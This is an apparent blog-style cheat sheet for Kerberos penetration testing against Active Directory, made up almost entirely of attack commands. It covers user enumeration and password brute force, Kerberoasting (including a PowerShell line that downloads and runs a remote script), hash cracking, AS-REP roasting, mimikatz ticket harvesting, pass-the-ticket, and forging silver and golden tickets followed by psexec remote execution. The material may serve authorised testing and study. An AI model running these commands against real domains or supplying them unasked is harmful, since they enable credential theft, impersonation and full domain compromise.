Today I will write about Kerberos Penetration Testing, which Active Directory uses to manage authentication inside the environments.
How does Kerberos work?
Kerberos Components
- KDC – Kerberos Distribution Center
- Client – Client requesting access to a service
- Service – service to allow when a ticket is requested
TGT – Ticket Granting Ticket
Kerberos Authentication
Enumeration
nmap --script krb5-enum-users --script-args krb5-enum-users.realm='rfs.local'-p 88 <target-ip>
kerbrute userenum --dc 10.0.0.1 -d example.domain usernames.txt
kerbture bruteuser --dc 10.0.0.1 -d example.domain passwords.txt username
Brute Force Kerberos
kerbrute bruteforce --dc 10.0.0.1 -d example.domain combos.txt
Kerberos Attacks
Kerberoasting
python GetUserSPNs.py <domain_name>/<domain_user>:<domain_user_password> -outputfile <output_TGSs_file>
.\Rubeus.exe kerberoast /outfile:<output_TGSs_file>
iex (new-object Net.WebClient).DownloadString("https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1")
Invoke-Kerberoast -OutputFormat <TGSs_format [hashcat | john]> | % { $_.Hash } | Out-File -Encoding ASCII <output_TGSs_file>
Crack the Hashes
hashcat -m 13100 --force <TGSs_file> <passwords_file>
john --format=krb5tgs --wordlist=<passwords_file> <AS_REP_responses_file>
ASREPRoast
Check ASREPRoast for all domain users (credentials required).
python GetNPUsers.py <domain_name>/<domain_user>:<domain_user_password> -request -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file>
Check ASREPRoast for a list of users (no credentials required)
python GetNPUsers.py <domain_name>/ -usersfile <users_file> -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file>
Pass The Ticket (PTT)
Harvest Tickets in Linux
grep default_ccache_name /etc/krb5.conf
cp tickey /tmp/tickey
/tmp/tickey -i
Harvest Tickets in Windows
mimikatz # sekurlsa::tickets /export
.\Rubeus dump
Convert Tickets
python ticket_converter.py ticket.kirbi ticket.ccache
python ticket_converter.py ticket.ccache ticket.kirbi
Overpass The Hash/Pass The Key (PTK)
python getTGT.py <domain_name>/<user_name> -hashes [lm_hash]:<ntlm_hash>
python getTGT.py <domain_name>/<user_name> -aesKey <aes_key>
python getTGT.py <domain_name>/<user_name>:[password]
export KRB5CCNAME=<TGT_ccache_file>
python psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
Silver Tickets
python ticketer.py -nthash <ntlm_hash> -domain-sid <domain_sid> -domain <domain_name> -spn <service_spn> <user_name>
python ticketer.py -aesKey <aes_key> -domain-sid <domain_sid> -domain <domain_name> -spn <service_spn> <user_name>
export KRB5CCNAME=<TGS_ccache_file>
Execute remote command to use the TGT.
python psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
Golder Tickets
python ticketer.py -nthash <krbtgt_ntlm_hash> -domain-sid <domain_sid> -domain <domain_name> <user_name>
python ticketer.py -aesKey <aes_key> -domain-sid <domain_sid> -domain <domain_name> <user_name>
export KRB5CCNAME=<TGS_ccache_file>
python psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
What is an SPN?
Service Principal Name
What is a Ticket?
What type of tickets exists?
What is a silver ticket?
What is a Golden Ticket?
What is a skeleton key?